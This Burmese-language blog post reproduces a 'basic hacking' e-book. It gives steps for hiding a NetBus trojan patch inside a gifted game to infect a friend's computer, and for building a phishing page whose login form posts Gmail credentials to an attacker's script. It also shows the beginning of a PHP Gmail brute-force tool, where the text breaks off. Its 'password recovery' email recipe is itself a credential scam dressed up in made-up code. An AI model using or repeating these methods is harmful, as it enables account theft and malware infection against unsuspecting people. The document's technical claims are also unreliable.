 လံုျခံဳေရးဆိုင္ရာ ေကာင္းမြန္ေသာ Password မ်ားကို တိုက္ခိုက္ရန္မွာ မလြယ္ကူလွေပ။
Dictionary Attack အတြက္ အသံုးျပဳေသာ Programme ေပါင္းမ်ားစြာရွိၿပီး၊ အခ်ိဳ႕ကိုအခမဲ့ရယူ သံုးစြဲႏိုင္သည္။

   Brute Force Attacks

   Brute Force Attack သည္ ျဖစ္ႏိုင္ေခ်ရွိေသာ Password ကို Letters မ်ား (abcdefghijklmno……)၊ Number မ်ား (0123…….)၊ Special Characters
(@#%*^!”>,, …..) စသည္တို႔ကို တြဲဖက္ၿပီး ၄င္း Results မ်ားကို Password Database ႏွင့္တိုက္ဆိုင္စစ္ေဆးကာ Password ကို ရယူျခင္းပင္ျဖစ္သည္။

Monday, May 6, 2013

အေျခခံ Hacking နည္းပညာစာအုပ္ ။

အေျခခံ Hacking နည္းပညာစာအပ္ မာတိကာ
Introduction: ဟက္ကာဆိုတာဘာလဲ ႏွင့္ ကြ်ႏ္ုပ္၏ အျမင္
အပိုင္း (၁) : လိုအပ္ေသာအရည္အျခင္းမ်ား
အပိုင္း (၂) : Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား
……….Intro
……….Trojan Horse ဟုေခၚေသာ virus အေၾကာင္း
…………ဟက္ကာေတအြ သုံးျပဳေသာ လွ်ိဳ႕၀ွက္ အရာမ်ား
………..Port Scanning
………..SubSeven
……….NetBus
အပိုင္း (၃) : Gmail Password Hack နည္း
…………..Phishing အေၾကာင္း Intro
အပိုင္း (၄) : Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း
အပိုင္း (၅) : Windows ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား
………. Registry သို့၀င္ေရာက္ေမႊေႏွာက္ျခင္း
……… Folder ကို software မသံုးပဲ lock ခ်နည္း ႏွင့္ Funny Command ေရးနည္း
……… Cmd Dos Command နည္းနည္းပါးပါး
……… Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
……… website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္
စာေရးသူ (မစၥတာ.ေမာင္ဘစ္ေန)
(18-9-2009 ~ 30-9-2009)
ဟက္ကာဆိုတာဘာလဲ ??? ကြ်ႏ္ုပ္၏အျမင္ ။
Hacking ပညာရပ္ဆိုသည္ သင္ယူလို႔ရေသာ ပညာမဟုတ္။ အသံုးခ် နည္းပညာမ်ားကို ေလ့လာေတြ႔ရွိျပီး
အားနည္းခ်က္ကို ရွာေဖြႏိုင္ေသာ ပညာျဖစ္သည္။ Online ေပၚတြင္ Hacking နဲ႔ပတ္သတ္ေသာ
စာအုပ္မ်ားစြာကိုေတြ႕ဘူးျပီး Hacking ႏွင့္ပတ္သတ္ေသာ web site မ်ားလဲ ေပၚထြက္ေနပါျပီ။ Vulnerability
ေပါင္းမ်ားစြာကို hacker ဟုေခၚေသာ လူစုမ်ားက ရွာေဖြေတြ႔ရွိျပီး web site ေပါင္းမ်ားစြာတြင္ တင္ထားၾကပါတယ္။ အဲဒီ
နည္းပညာရပ္ေတြကို အသံုးျပဳ မွီခို ေနတဲ့လူေတြအမ်ားႀကီးရွိပါတယ္။ ဒါေတြက ဟက္ကာေတြလားဆိုတဲ့
ေမးခြန္းေမးႏိုင္ပါတယ္။
Tool user ေတြပါ၊ professional hacker တစ္ေယာက္ဆိုတာ ပါရမီအရင္းခံျပီး ကြန္ပ်ဴတာ နည္းပညာ
ကိုရူးသြပ္တဲ့ လူတစ္ေယာက္ရဲ႕IT ပိုင္းဆိုင္ရာေပ်ာ့ကြက္ကို ရွာေတြ႔ႏိုင္ျခင္းျဖစ္ပါတယ္။ White, black, gray လို႔ေခၚတဲ့
hacker သံုးမ်ိဳးခြဲထားပါတယ္။ နဲ႔ black ကေတာ့ ရန္သူေတြေပါ့။ အမ်ားစုက gray ေတြပါ။
ဒါဆို က်ေနာ္ေရးထားတဲ့ စာအုပ္ကေကာ၊ ဖတ္ျပီး hacker တစ္ေယာက္ျဖစ္ႏိုင္ပါ့မလား
လို႔ေမးႏိုင္စရာအေၾကာင္းရွိပါတယ္။ က်ေနာ္ကိုယ္တိုင္ေတာင္မွ ဟက္ကာမဟုတ္တာဗ်။ :D ။ က်ေနာ္သိတာေလးေတကြ ို
share လုပ္ေပးခ်င္တဲ့ရည္ရြယ္ခ်က္ကို အဓိကထားတာပါ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၁) လိုအပ္ေသာ အရည္အျခင္းမ်ား
hacking လုပ္သည့္ေနရာတြင္ တစ္ဦးတစ္ေယာက္လုပ္ျခင္းထက္ အ မ်ားႏွင့္
ပူေပါင္းျပီး လုပ္လွ်င္ ပုိျပီး အ က်ဳိးရွိသည္။ ထုိ႕ေၾကာင့္ Ethical hacking တြင္ Hacker
မ်ားစုဖြဲ႕ျပီး TEAM တစ္ခုအ ေနျဖင့္ လုပ္ေဆာင္ရသည္။ ၎တုိ႕သည္ အ ခ်ိန္တုိင္း မိမိ
ကုိင္တြယ္ရေသာ System အား လုိအ ပ္ခ်က္မ်ားကုိရွာေဖြျပင္ဆင္ရသည္။
တုိက္ခုိက္ျခင္းမ်ဳိးစုံ ရွိသည့္အ တြက္ အ ားလုံးကုိသိရွိရန္မွာမျဖစ္ႏူိင္ေပ။မိမိhacking
အ ဖြဲ႕တြင္ လုပ္ကုိင္ေသာသူမ်ားသည္ ေအာက္ေဖာ္ျပပါ ပညာရပ္မ်ားကုိ တစ္ဦး
တစ္ေယာက္ျခင္း အ ေသအ ခ်ာတတ္ေျမာက္ရန္လုိအပ္သည္။
· Programming
· Webdeveloping
· Software Crackers
· Web Hackers
· Network security groups
· system admin groups
· database Hackers
· crytoanalizer
၎ပညာရပ္မ်ား အားလုံးကုိ သိရွိရန္ မလုိေပ။ သုိ႕ေသာ္ general knowledge
သိရွိရမည္။ မိမိ Hacker အဖြဲ႕တြင္ လူတစ္ေယာက္စီ ပညာတစ္ခုစီကုိ
ေသေသခ်ာခ်ာတတ္ေျမာက္ရန္လိုအပ္သည္။
Hacker တစ္ေယာက္ေအာင္ျမင္စြာျပဳလုပ္ႏုိင္ရန္အတြက္လုိအပ္ခ်က္မ်ားစြာရွိသည္။
မိမိ ၀င္ေရာက္လုိေသာ ေနရာ၏ data အျပည့္အစုံကုိသိရွိေအာင္ အရင္ဆုံးျပဳလုပ္ရမည္။
IP address
မိမိ၀င္ေရာက္ရမည့္ Computer ၏ address
Hostname
မိမိ ၀င္ေရာက္ရမည့္ Computer ၏ နာမည္
Software
၎ Computer တြင္အသုံးျပဳေသာ Software မ်ား
Firewall rules
Network ၏ လုံျခဳံေရးအတြက္အသုံးျပဳထားသည္မ်ား
Phone Numbers
ဖုန္းနံပါတ္
Employee names
အလုပ္သမားမ်ား ၏ အေၾကာင္းအရာမ်ား
မိမိတုိ႕သိလုိေသာ အခ်က္မ်ားစြာကုိ Internet မွ မ်ားစြာအကူအညီေပးႏုိင္သည္။
သင ္hacking လုပ္လုိေသာ ေနရာ၏ data ၆၀% ကုိ internet မွရွာႏုိင္ပါသည္။
၎၏ company ႏွင့္ပတ္သက္ေသာ ဖုန္းနံပါတ္ ၊ IP address ၊ Firewall ၊ အလုပ္သမား
ဦးေရ ၊ company စတင္တည္ေထာင္ေသာေန႕ ၊ company ၏ ပုိင္ရွင္ အမည္မ်ား ၊
company ခ်ိတ္ဆက္ထားေသာ တျခားNetwork မ်ား၊ company ၏ထုတ္ ကုန္မ်ားစသည့္
သတင္းအခ်က္အလက္မ်ားကုိအက်ဳိးရွိရွိ အသုံးခ်ရမည္ျဖစ္သည္။
hacking ျပဳလုပ္ရန္အတြက္အသုံးျပဳေသာ Tools မ်ား
1. Google (အေၾကာင္းအရာမ်ားစြာကုိ ရွာႏုိင္သည္။)
2. Google Earth (Network ခ်ိတ္ဆက္ျခင္းမ်ားကုိ ၾကည့္ရႈရန္)
3. Nmap (IP addres မ်ားကုိၾကည့္ရႈရန္)
4. John The Ripper (Password မ်ားကုိေက်ာ္ႏုိင္ရန္)
5. Lan Guard (မိမိ၏ Network ကုိ ေစာင့္ၾကည့္ရန္)
6. Pwdump 6 (Password မ်ားကုိခ်ိန္းရန္)
7. Firebug (website မ်ားမွျပင္ၿပီး server ထဲသို႕၀င္ရန္)
8. Java ( Mysql ကုိျပင္ဆင္ရန္)
9. putty (တျခား Computer ထဲသုိ႕ ၀င္ေရာက္ရန္)
၎ တုိ႕ျဖင့္စတင္စမ္းသပ္ အသုံးျပဳၾကျပီး မိမိတုိ႕၏ ဥာဏ္ရည္ဥာဏ္ေသြးအရ
ဆက္လက္အေကာင္အထည္ေဖာ္ၾကည့္သင့္သည္။Tools မ်ား၏ အလုပ္လုပ္ပုံကုိ ေသခ်ာ နား
လည္မွသာ အသုံးျပဳႏုိင္မည္ျဖစ္သည္။Tools မ်ား၏ အားနည္းခ်က္မ်ားကုိ သိထားရမည္ ျဖစ္
သည္။ Tools မ်ားကုိသုံးလွ်င္ ၎တုိ႕၏ သုံးစြဲပုံ အေၾကာင္းကုိ ေသခ်ာဖတ္ၾကည့္ရမည္။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၂) Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား…
Intro
Trojan Horse
Hacking ရဲ႕အဓိက တရားခံလို႔ေျပာႏိုင္တာကေတာ့ Trojan ဆိုတဲ့ virus ေၾကာင့္ပါ။
အင္တာနက္ဆိုင္ေတြမွာ ေတြ႔ရတတ္တယ္ ။ USB Stick ေတြကို virus scan လုပ္လိုက္ရင္
ေတာ္ေတာ္မ်ားမ်ားေတြ႔ရတဲ့ virus တစ္မ်ိဳးေလ။ Trojan, Trojan နဲ႔ လူသိေတာ္ေတာ္မ်ားပါတယ္။
က်ေနာ္ေလ့လာလို႔သိရတာေတာ့ ကြန္ပ်ဴတာရဲ႕ အခ်က္အလက္ေတြ၊ password ေတြအခိုးခံရတာဟာ အဲဒီ
Trojan ေတြေၾကာင့္လို႔ သံသယျဖစ္မယ္ဆိုရင္ မမွားႏိုင္ပါဘူး။ Trojan ဆိုတာ program ေသးေသးေလးပါ။
အဲဒီ program ေလးက ကြန္ပ်ဴတာတစ္ခု ထဲမွာ ၀င္ေရာက္ေနရာယူကာ hacker ဆီသို႕ ၄င္းကြန္ပ်ဴတာ၏
information မ်ားကို သတင္းေပးႏိုင္ေသာ Program တစ္ခုပါ။ ၄င္း Trojan ျဖင့္ ကြန္ပ်ဴတာမ်ားကို
ထိန္းခ်ဳပ္ႏိုင္ပါသည္။
Trojan မ်ား၏ အမ်ားအားျဖင့္ လုပ္ေဆာင္ႏိုင္ေသာ အစြမ္းသတိၱမ်ားကို ေအာက္တြင္ေဖၚျပထားပါသည္။
.CD-Rom drive မ်ားကို အဖြင့္၊ အပိတ္ control လုပ္ႏိုင္ျခင္း
.သင္၏ ကြန္ပ်ဴတာမွ screenshot ကို capture လုပ္ႏိုင္ျခင္း
.သင္၏ password မ်ား ( Windows, MSN, Gmail, Yahoo,….အစသျဖင့္) ကို hacker ဆီသို႔ သတင္းပို႔ေပးႏိုင္ျခင္း
.သင္၏ hard disk ထဲမွ file မ်ားကို လိုသလို ကူးယူႏိုင္ျခင္း၊ delete လုပ္ႏိုင္ျခင္း
.Keyboard ႏွင့္ mouse ကို Disable လုပ္ႏိုင္ျခင္း……အစသျဖင့္
Popular ျဖစ္ေနေသာ Trojan မ်ား
-NetBus
-SubSeven
NetBus Trojan မွာ အျခား Trojan မ်ားကဲ့သို႕ အေရးႀကီးတဲ့ အစိတ္အပိုင္း ၂ ပိုင္း ရွိပါတယ္။ NetBus Server.exe ရယ္
Patch.exe ရယ္ဆို တဲ့ exe file ၂ ခု ပါ၀င္ပါတယ္။ NetBus Server ကို သင္၏ ကြန္ပ်ဴတာထဲသို႔ အရင္ဆံုး install
လုပ္ရန္လိုပါသည္။ Patch file ကို သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲသို႔ သြင္းႏိုင္ရန္ အဓိက လိုအပ္ပါသည္။
ဥပမာ- သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာ ပိုင္ရွင္၏ information ကိုအရင္ဆံုးစံုစမ္းသင့္ပါသည္။ သင္သည္
မိတ္ေဆြ သူငယ္ခ်င္းဆို လွ်င္ပို၍ အဆင္ေျပပါသည္။ ေရွးဦးစြာ သူ ၏ email သို႔ ပို႔၍ run
ခိုင္းျခင္းအားျဖင့္လဲ ရႏိုင္ပါသည္။ ဒါမွမဟုတ္ သူ႔အား ဂိမ္းလက္ေဆာင္ေပးသလိုလိုျဖင့္ ၄င္းဂိမ္းထဲတြင္
Patch file ကို သြင္းေပးလိုက္ပါ။ chess.exe file ဆိုပါစို႕။ ၄င္း exe file ထဲသို႔ Patch သြင္းလိုက္ပါ။
ResHacker software ျဖင့္ ဖန္တီးႏိုင္ပါသည္။ ထို႔ေနာက္ သင္ဖန္တီးလိုက္ေသာ chess.exe ဟာ
သာမန္အတိုင္းပါပဲ။ ဘာမွမေျပာင္းလဲသြားပါဘူး။ အဲဒီ ဟာကို install လုပ္လိုက္လွ်င္ ဂိမ္းဟာ သူ႔
orginal အတိုင္းပါပဲ။ ဘာမွ ျပႆနာမေပးႏိုင္ပါဘူး။ သင္ေပးလိုက္တဲ့ chess ထဲက patch file
ေလးက သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲတြင္ ေနရာယူျပီးသားျဖစ္ပါတယ္။ အဲဒီ file ကလဲ hidden
ျဖစ္ေနတာပါ။ အဲဒါဆို အဆင္ေျပသြားပါလိမ့္မယ္။ စ hack က်တာေပါ့။…..:D ။
ဟက္ကာေတြ အသံုးျပဳေသာ လွ်ိဳ႔၀ွက္ အရာမ်ား
(၁) Port Scanners
Port Scanner ဆိုတာဘာလ ဲ
Port Scanning ရဲ႕ အဓိက ရည္ရြယ္ခ်က္ကေတာ့ opening port ေတြကို ရွာဖို႕ျဖစ္ပါတယ္။ Hacker တစ္ေယာက္
အတြက္ အေျခခံက်တဲ့ နည္းတစ္ခုပါ။ opening port ေတြကိုသိမွ hack လို႔လြယ္မွာကိုး….။Hacker အေနနဲ႔ server ေပၚ
မွာလုပ္ေနတဲ့ service ေတြကို ၾကည့္ျခင္းအားျဖင့္ vulnerability ေတြကို ရွာႏိုင္ဖို႔ အခြင့္အလန္းပိုမ်ားလာမွာပါ။
နာမည္ႀကီးတဲ့ nmap port scan tool ကိုေဒါင္းလုတ္ခ်ဖို႔ link ပါ > http://nmap.org/download.html <
Online ေပၚမွာအျခားport scanner tool ေကာင္းေကာင္းေတြအမ်ားႀကီးရွိပါေသးတယ္….။
Start Scanning
Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrp)
Port Scanning ကို ၂ မ်ိဳးလုပ္ႏိုင္ပါတယ္။ ပထမတစ္ခုက Single IP port ဖြင့္ရန္အတြက္ႏွင့္ ဒုတိယတစ္ခုကို Range IP
Port ဖြင့္ရန္ျဖစ္ပါတယ္။ IP ဆိုတာက ေရွ႕ကဟာကတူျပီး အေနာက္က နံပါတ္ကေျပာင္းလဲသြားႏိုင္ပါတယ္။
ဥပမာ 192.168.1.2 , 192.168.1.3 အစသျဖင့္ေပါ့။ ဖုန္းနံပါတ္အတိုင္းပါပဲ (530-xxx) အစသျဖင့္……….
Range IP ဆိုတာက ေတာ့ ( 555-0000 to 555-9999) အထိ ၾကားထဲက မည္သည့္ဂဏန္းမဆို ျဖစ္ႏိုင္ပါတယ္။
Port Scanner ဆိုတာ ဒီလုိမ်ိဳးေပါ့
(၂) Trojan
Trojan အေၾကာင္းကေတာ့ Hacking မွာ မပါ မျဖစ္ကိုေတြ႔ရမွာပါ။ ဘာလို႔လဲဆိုေတာ့ Trojan ေတြက
ဟက္ကာေတြရဲ႕လက္စ ြဲ virus တစ္မ်ိဳးမို႔လို႔ပါ။ Trojan ေပါင္း တစ္ရာေက်ာ္နီးပါရိွပါတယ္။ အဲဒီထဲက
စံုတြဲ သေဘာလိုျဖစ္ေနေသာ Trojan အေၾကာင္း ဥပမာ အေနႏွင့္ေဖၚျပထားပါတယ္။ အဲဒီ Trojan ျဖင့္
က်ေနာ္ အခုလက္ရွိေမႊေနတယ္ေလ…..
Sub Seven
Sub Seven Trojan မွာ လုပ္ေဆာင္ႏိုင္တဲ့ စြမ္းရည္ အမ်ားအျပားရွိပါတယ္။ ၄င္း Trojan ဟာ က်ေနာ္ေတြ႔ဖူးသမွ်
Trojan ၁၀၀ေက်ာ္ေလာက္ထဲက အေကာင္းဆံုး လို႔ ယူဆပါတယ္။ ၄င္းရဲ႕လုပ္ေဆာင္ႏိုင္တဲ့စြမ္းရည္ေတြကို
ေအာက္မွာေဖၚျပထားပါတယ္။
SubSeven ဆိုတာ ဒီလိုမ်ိဳးပါ
လုပ္ေဆာင္ႏိုင္မွဳမ်ား
-address book
-www pager retriever
-UNI2IP
-remote IP scanner
-host lookup
-get WINDOWS CD-Key
-update victim from URL
-ICQ takeover
-FTP root folder
-retrieve dial-up passwords along with phone numbers and username
-port redirect
-IRC boot for a list of commands
-file manager bookmarks
-make folder, delete folder (Empty of Full)
-process manager
-text 2 speech
-Restart server
-Aol Instant Messenger Spy
-Yahoo Messenger Spy
-Microsoft Messenger Spy
-Retrieve list of ICQ uins and passwords
-App Redirect
-Edit files
- set/change screen saver settings
-Restart Windows
-IP Tools (Resolved Host name/ Ping IP address)
-Address
-City
-E-Mail
-Real name
-Country code
-Local Phone
-Zip code………….အစသျဖင့္ေပါ့…….. အျခားလုပ္ေဆာင္ႏိုင္မႈမ်ားစြာရွိပါေသးတယ္….။
NetBus
Net Bus ဆိုတာကေတာ့ ဟိုးအရင္တုန္းက သံုးခဲ့တဲ့ Trojan အေဟာင္းတစ္မ်ိဳးပါ။ ဒါေပမဲ့ ေတာ္ေတာ္
မ်ားမ်ားကေတာ့ ၄င္းကို ခုခ်ိန္ထိ သံုးစြဲလွ်က္ရွိၾကပါတယ္။ Net Bus နဲ႔ေမႊြရတာလဲေတာ္ေတာ္အဆင္ေျပပါတယ္။
စမ္းသံုးၾကည့္ေပါ့……..။ သံုးနည္းကို အေပၚတြင္ ေဖၚျပၿပီးပါၿပီ။
NetBus ကို ဤသို႔ေတြ႔ျမင္ရပါတယ္။
NetBus ၏ လုပ္ေဆာင္ႏိုင္စြမ္းမ်ားကို အထက္တြင္ ေဖၚျပထားပါသည္။ အေသးစိတ္ေတာ့ မေဖၚျပေတာ့ပါ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၃) Gmail Password Hack နည္း
Gmail Password ကို Hack ရာတြင္ ဘာေတြလိုအပ္သနည္း ???
Hack နည္းေပါင္းမ်ားစြာရွိပါတယ္။ ေရွးဦးစြာ ရိုးရိုးရွင္းရွင္းျဖင့္ Hack ေသာနည္းလမ္းကို အရင္ေဖၚျပပါမည္။ လြန္ခဲ့တဲ့
၂၀၀၈ ခုႏွစ္ေလာက္တုန္းက javascript နည္းျဖင့္က်ေနာ္ သံုးၾကည့္ဖူးပါတယ္။ အခုေနာက္ပိုင္းထပ္သံုးၾကည့္တာ
မရေတာ့ပါဘူး၊ Google က admin ေတြကလဲ ငတံုးေတြမွမဟုတ္တာ။ သူတို႔ security ေတြကို
ခဏခဏျပန္ျပန္ျပင္တယ္ေလ။ က်ေနာ္တို႔ထက္အမ်ားႀကီးမွ အမ်ားႀကီးကိုလည္တာေပါ့။ ယခု နည္းက ေတာ့ Google ရဲ႕
security ေတြကို ျဖတ္ေက်ာ္လို႔ရတဲ့ javascript အသစ္တစ္ခုပါ။ က်ေနာ္ဤ နည္းကို ႏိုင္ငံျခား Hacking
စာအုပ္ထဲကေနု ဘာသာျပန္ထားတာပါ။ ၀ါသနာပါရင္ နည္းနည္းပါးပါးေလာက္ ၀င္ေမႊၾကည့္ၾကေပါ့
လုပ္နည္း
တစ္ဆင့္ျခင္းဆီေဖၚျပထားပါတယ္။
အဆင့္(၁) သင္၏ကိုယ္ပိုင္ Gmail account ျဖင့္ Gmail ထဲသို႔ Login ၀င္ပါ။
မွတ္ခ်က္ ( passwrdserver2@gmail.com သို႔အရင္ဆံုး add ထားပါ၊ add
ထားျပီးအနည္းဆံုးရက္ေပါင္း ၃၀ ျပည့္မွ ဤလုပ္နည္းသို႔စတင္လုပ္ႏိုင္မည္ျဖစ္သည္)
အဆင့္(၂) Login ၀င္ျပီးျပီးျခင္း compose mail လုပ္ပါ။To: ဆိုတဲ့ေနရာမွာ passwrdserver2@gmail.com
လို႔ေရးပါ။(passwrdserver2@gmail.com ဆိုတာ Google server မွ username ႏွင့္ password မ်ား ကို
မွတ္ထားေသာ ေနရာသို႔ mail ပို႔လိုက္ျခင္းျဖစ္ပါတယ္။ Automatic server ကေန သင့္ကို mail
တစ္ေဆာင္ျပန္ပို႔ပါလိမ့္မယ္။ ေစာင့္ေနပါ)
အဆင့္(၃) Subject: ဆိုတဲ့ ေနရာမွာ ‘’PASSWORD RECOVERY’’ ဆိုၿပီး တိတိက်က်ေရးပါ။
စာလံုးေပါင္းမမွားပါေစႏွင့္။ အေရးႀကီးပါတယ္။
အဆင့္(၄) mail ကိုစတင္ေရးႏိုင္ပါျပီ။ ပထမစာေၾကာင္းမွာ သင္ hack ခ်င္ေသာ သူ၏ account ကိုေရးပါ။
အဆင့္(၅) ဒုတိယစာေၾကာင္းမွာေတာ့ သင္ယခုလက္ရွိအသံုးျပဳေနေသာ gmail account ကိုေရးပါ။
အဆင့္(၆) တတိယေျမာက္စာေၾကာင္းမွာေတာ့ သင္၏ gmail password ကိုေရးပါ java script ျဖင့္ users
administrator server security ကိုျဖတ္ေက်ာ္ရာတြင္ verify လုပ္ရန္သင္၏ password ကိုလဲလိုပါတယ္။
အဆင့္(၇) ေနာက္ဆံုးအဆင့္နဲ႔ တကယ့္ကိုအေရးအႀကီးဆံုးအဆင့္ပါပဲဗ်ာ..။ ေအာက္မွာ က်ေနာ္ေဖၚျပထားတဲ့
code ကိုေသေသခ်ာခ်ာ ေကာ္ပီကူးပါ။
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
အားလံုး ready ျဖစ္ပါက send လို႔ရပါျပီ။ send လိုက္ပါေတာ့။
ဥပမာ- သင္၏ ကိုယ္ပိုင္ gmail account က myname@gmail.com ဆိုပါစို႔
သင္၏ password က 123456 လို႔မွတ္လိုက္ပါ။ သင္ hack ခ်င္ေသာ သူ၏
Gmail account ကေတာ့ test@gmail.com လို႔ထားလိုက္ပါ။က်ေနာ္ေအာက္မွ ေဖၚျပထားတဲ့အတိုင္း
mail တစ္ေဆာင္ေရးပါ။……..
To: ‘’gmail.com’’<passwrdserver2@gmail.com>
Bcc: , cc: ထိုေနရာမ်ားတြင္ ဘာမွ မေရးပါႏွင့္
Subject: ‘’PASSWORD RECOVERY’’
Text box ထဲတြင္ေရးရန္
test@gmail.com
myname@gmail.com
123456
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
System Reg လို႔ေခၚတဲ့ mail တစ္ေဆာင္ သင့္ဆီကို ၆ နာရီအတြင္း automatic ျပန္ပို႔ပါလိမ့္မယ္။ ထို mail
ထဲတြင္ သင္ hack လိုေသာသူ၏ information မ်ားအကုန္ပါလာမွာျဖစ္ပါတယ္။ စမ္းၾကည့္က်ပါ။ က်ေနာ့္ mail
ကိုေတာ့ မ hack နဲ႔ေနာ္ password ကို အလံုး ၆၀ ေပးထားလို႔ပါ…..ဟီး……ဟီး…..
Phishing
Phishing ႏွင့္ ပတ္သတ္ျပီး
က်ေနာ္ Phishing ဆိုတဲ့ အေၾကာင္းကို သိသေလာက္ နည္းနည္းေျပာခ်င္ပါတယ္။ တကယ္ေတာ့ အဲဒီ Phishing
ဆိုတာ လိမ္တဲ့ နည္းေလးတစ္ခုပါ။ သူမ်ားရဲ႕ Gmail account ပဲျဖစ္ျဖစ္၊ Yahoo account ပဲျဖစ္ျဖစ္၊ mediafire account
ပဲျဖစ္ျဖစ္ မည္သည့္ အေကာင့္ ကိုမဆို လိမ္ညာကာ password ယူလို႔ရေသာနည္းလမ္းျဖစ္ပါတယ္။ Phisher ဆုိတာ
ကြန္ပ်ဴတာ အသုံးၿပဳသူတုိ႔ရဲ႕ Data Information ေတြကုိရယူရန္ ၿပဳလုပ္ထား အတုအေရာင္စာမ်က္ႏွာ (a fake login
page) တစ္ခုသာလွ်င္ ၿဖစ္ပါတယ္။ fake login page ေတြက Computer user ေတြရဲ႕ user name and password
ေတြကုိ ဖုိင္တစ္ခုကေန၊ ဒါမွမဟုတ္ ေမးလ္ကုိ Direct ပုိ႔တဲ႔ နည္းလမ္းသုံးထားတာမ်ားပါတယ္... တစ္ခ်ဳိ႕ေတြက
က်ယ္က်ယ္ၿပန္႔ၿပန္႔သုံးၾကပါတယ္..
သ႔ရူ ဲ႕အလုပ္လုပ္ပုံက ရိုးရွင္းပါတယ္။ free host, free domain, code script ( မိမိ hack ခ်င္တဲ့ site ရဲ႕ code ပါ )
ျပီးရင္ setting အနည္းငယ္ေလး ၀င္ျပင္ျပီးရင္ Hack လို႔ရပါျပီ။
php enabled ထားတဲ႔ web hosting တစ္ခုလုိပါတယ္... Phishing Attacker ေတြကေတာ့ free ရတဲ႔ webhosting မွာ
account တစ္ခုဖြဲ႔ၿပီးသုံးေလ့ရွိပါတယ္...
မိမိအသုံးၿပဳတဲ႔ mail services, ဆုိၾကပါဆုိ Gmail
https://mail.google.com ကုိပဲသြားသြား, https://www.gmail.com ပဲ ၿဖစ္ၿဖစ္ ဖြင့္ကာ Ctrl + U သုိ႔မဟုတ္ Menu bar
မွာ view>Page Source ကိုသြားကာ အကုန္လုံးကုိ Copy ကူးၿပီး text editor or web editor .. example :
Dreamwaver ကဲ႔သုိ႔ Editor ထဲကုိ အကုန္လုံး paste လုပ္ယူလုိက္ပါ...
Code:
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post"
onSubmit="return(gaia_onLoginSubmit());">
ကုိ မိမိဖန္တီးထားတဲ႔ login page မွ data ေတြကုိ ရယူႏုိင္ေအာင္ သိမ္းဆည္းထားတဲ႔ login script file
ကုိလမ္းညြန္ေပးရပါတယ္..
ဥပမာ..
Code:
<form action="http://www.planetcreator.net/tutorial/Fake Login/login.php" method="post">
(login.php ဆုိတာက fake login page က User ရုိက္ထည့္လုိက္ေသာ user name and password ကုိရယူတာပါ)
အဲ႔လုိ ၿပင္ဆင္မူ႔ေတြလုပ္ၿပီး free hosting တစ္ခုမွာတင္...
user ကုိ နည္းမ်ဳိးစုံနဲ႔ မိမိရဲ႕ ေထာင္ေၿခာက္ထဲကုိ အေရာက္သြင္းၾကတာပါ..........
ဒါက Fake Login Page ေတြရဲ႕ နမူနာပါ။ တကယ္တမ္း fake login ေတြက ဒီေလာက္နဲ႔ မလုံေလာက္ပါဘူး... Phishing
Hacker ေတြက သူတုိ႔ရဲ႕ phisher ေတြကုိ နည္းလမ္းမ်ဳိးစုံနဲ႔ ၄င္းတုိ႔ရဲ႕ Victim ယုံၾကည္ေလာက္ေအာင္
ေသြးေဆာင္ၿဖားေယာင္း၊ ၿပီးေတာ့ attacker ဖန္တီးထားတဲ႔ page ကုိေရာက္ရင္ေတာင္မွ သာမာန္ user
တစ္ေယာက္အတြက္ လုံး၀ (လုံး၀) မသိေအာင္ address bar / mouse down function
ေတြကအစေပါ႔...စသည္..စသည္
၄င္း Fake Loign အားသြားေရာက္ စမ္းသပ္ရန္... စမ္းသပ္ရုံစမ္းသပ္ပါ... မိမိရဲ႕ gmail user name and password
ကုိေယာင္လုိ႔ေတာင္ ရုိက္မထည့္လုိက္နဲ႔.... လုံး၀ တာ၀န္မယူ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၄) Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း
free host တခုခုမွာ ဒီကုဒ္ေတြကို သြင္းျပီး ဒါမွမဟုတ္ ကိုယ့္စက္ကို local host အေနနဲ႕ setting ခ်ျပီး
ဂ်ီေမးကိုေဖာက္လို႕ရပါျပီ။
<?php
//////////////////////
////Gmail-Brute//////
///////////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
<tr>
<td>
